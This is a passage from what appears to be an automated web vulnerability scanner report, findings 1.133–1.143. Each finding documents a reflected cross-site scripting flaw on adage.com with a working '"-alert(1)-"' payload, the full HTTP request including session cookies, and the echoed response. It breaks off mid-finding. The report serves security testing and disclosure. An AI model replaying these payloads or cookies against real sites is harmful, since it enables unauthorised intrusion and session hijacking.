<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298944774";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scriptsbbaea"-alert(1)-"eeefe3ca7cb/fancybox/jquery.fancybox-1.3.4.css"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.
...[SNIP]...

1.133. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32362"-alert(1)-"036c1a3cc14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/fancybox32362"-alert(1)-"036c1a3cc14/jquery.fancybox-1.3.4.css?1298944774 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=AE55CB971BED5C684E4F629C75E67B7988E20740; path=/
Set-Cookie: HMAC=B9105EB09BFA84241E3D91B47B8077344FDF3429; path=/
Set-Cookie: HMAC=C4ADE70FB4501673D04CF5F4595D1E695FE0B98C; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298944774";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/fancybox32362"-alert(1)-"036c1a3cc14/jquery.fancybox-1.3.4.css"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cm
...[SNIP]...

1.134. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23685"-alert(1)-"11221a24f63 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/fancybox/jquery.fancybox-1.3.4.css23685"-alert(1)-"11221a24f63?1298944774 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=5BD1913E4766CC7AA3C9988B80FBB23F234A894B; path=/
Set-Cookie: HMAC=B1175D8822F39C60617574F35152CC67801DF7FF; path=/
Set-Cookie: HMAC=BBF594E808B9E9551C23E6FC2B1A681AB26CD9D7; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298944774";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css23685"-alert(1)-"11221a24f63"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.135. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.pack.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2228"-alert(1)-"3f6a5914556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scriptsd2228"-alert(1)-"3f6a5914556/fancybox/jquery.fancybox-1.3.4.pack.js?1297540766 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=AC651B77F5AF5C429FAEC8350EECB595105DBE8D; path=/
Set-Cookie: HMAC=0F14FDB57E9023703EB5F77CE40C8DB55A927776; path=/
Set-Cookie: HMAC=DB23DC6941243B354DB6D45412F8A70B3A018749; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1297540766";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scriptsd2228"-alert(1)-"3f6a5914556/fancybox/jquery.fancybox-1.3.4.pack.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.136. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.pack.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65dbb"-alert(1)-"0eb3d0faa8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/fancybox65dbb"-alert(1)-"0eb3d0faa8f/jquery.fancybox-1.3.4.pack.js?1297540766 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=3BBA260AA6282135847486BE613CC3C5E9A1BBB3; path=/
Set-Cookie: HMAC=5724F655C2672E4260A21124B09C8CA1AB994778; path=/
Set-Cookie: HMAC=A5145FA84EF3B1C5EC8DF9D2DC906558E122A612; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1297540766";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/fancybox65dbb"-alert(1)-"0eb3d0faa8f/jquery.fancybox-1.3.4.pack.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="
...[SNIP]...

1.137. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.pack.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 365e5"-alert(1)-"f04d5429c5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/fancybox/jquery.fancybox-1.3.4.pack.js365e5"-alert(1)-"f04d5429c5b?1297540766 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=17DB6C355A19E7BBA3D1788532321757A44401EF; path=/
Set-Cookie: HMAC=83091FD9AE521594115E127299AD2C2AC28A675D; path=/
Set-Cookie: HMAC=46A6BFF9ADA9E3128D7DD3AE70E468394345CA04; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
om";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1297540766";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js365e5"-alert(1)-"f04d5429c5b"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.138. http://adage.com/scripts/javascript.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/javascript.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bd4d"-alert(1)-"e75f5f53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts5bd4d"-alert(1)-"e75f5f53/javascript.js?1314299432 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B105902CECF646A35BB4F8375A004E474D091E61; path=/
Set-Cookie: HMAC=E72DD1D178C26E4DEE002141F6FDC36AD1A559F4; path=/
Set-Cookie: HMAC=6BA51D6A623A403BF493C9574DD29E4D8EBAF96D; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49454
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314299432";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts5bd4d"-alert(1)-"e75f5f53/javascript.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.
...[SNIP]...

1.139. http://adage.com/scripts/javascript.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/javascript.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5603a"-alert(1)-"122445a79d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/javascript.js5603a"-alert(1)-"122445a79d1?1314299432 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=1DDE5B82189FE4E37D5F7D50D475218FD2FCAA74; path=/
Set-Cookie: HMAC=AB028DE7156762235974E9CFA4CED6AE95DC89B5; path=/
Set-Cookie: HMAC=0F37F27C8F9F64C00F945194122577B048973CF6; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49457
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
bx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314299432";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/javascript.js5603a"-alert(1)-"122445a79d1"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.140. http://adage.com/scripts/jquery.easing.1.3.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.easing.1.3.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8620f"-alert(1)-"fc120b5733 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts8620f"-alert(1)-"fc120b5733/jquery.easing.1.3.js?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8D8B4E62F127FC630243F18B752F1D13C91FBB92; path=/
Set-Cookie: HMAC=F5589DF9A58488357D821D124583E9730D115E54; path=/
Set-Cookie: HMAC=F7D96B9A7F00D922CABA3EB9A241DE9BBBBD79F1; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49463
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts8620f"-alert(1)-"fc120b5733/jquery.easing.1.3.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js
...[SNIP]...

1.141. http://adage.com/scripts/jquery.easing.1.3.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.easing.1.3.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20fd1"-alert(1)-"c4cad94f04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/jquery.easing.1.3.js20fd1"-alert(1)-"c4cad94f04?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D57FF4FD6C95EB356DAA1DCFB39A94F4EAE86311; path=/
Set-Cookie: HMAC=C9C5BA2D5D3931CFB64B0D3B693B1B647210F7E2; path=/
Set-Cookie: HMAC=18F58A4B1C04C78CEDEF8CA26113C38C6CB2E9D1; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49463
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/jquery.easing.1.3.js20fd1"-alert(1)-"c4cad94f04"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.142. http://adage.com/scripts/jquery.onefblikev1.1.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.onefblikev1.1.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d26a"-alert(1)-"002706296ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts9d26a"-alert(1)-"002706296ff/jquery.onefblikev1.1.js?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D21D3A428D5F1CD285F15F8EBC97AC6FF8868685; path=/
Set-Cookie: HMAC=D14883A7CFCC2D7D4160A250CE2B4F373F5C7A0E; path=/
Set-Cookie: HMAC=1FF1BADAF3D0A1071D581D8649EFDFFB612107BF; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts9d26a"-alert(1)-"002706296ff/jquery.onefblikev1.1.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,
...[SNIP]...

1.143. http://adage.com/scripts/jquery.onefblikev1.1.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.onefblikev1.1.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6761"-alert(1)-"f29ca89fea7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

